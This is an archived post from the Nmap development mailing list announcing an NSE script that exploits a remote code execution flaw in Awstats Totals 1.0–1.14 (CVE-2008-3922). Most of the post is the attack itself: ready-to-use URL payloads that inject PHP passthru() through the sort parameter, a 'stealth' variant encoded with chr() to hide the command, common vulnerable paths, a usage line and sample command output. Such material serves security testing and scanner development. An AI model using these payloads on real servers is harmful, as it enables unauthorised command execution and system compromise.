Nmap Development mailing list archives
http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14
From: Paulino Calderon <paulino () calderonpale com>
Date: Mon, 11 Jul 2011 02:43:40 -0700
Hi nmap-dev, description = [[http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]
Stealth mode encodes the command string using PHP's chr() function. Ex. * Normal mode:<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
* Stealth mode: <code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code> Common paths for Awstats Total: * /awstats/index.php * /awstatstotals/index.php * /awstats/awstatstotals.php ]] --- -- @usage-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
-- -- @args http-awstatstotals-exec.uri Awstats Totals URI including path -- @args http-awstatstotals-exec.cmd Command to execute-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file --- -- Paulino Calderón Pale Web: http://calderonpale.com Twitter: http://www.twitter.com/paulinocaIderon
Attachment:
http-awstatstotals-exec.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Toni Ruottu (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 15)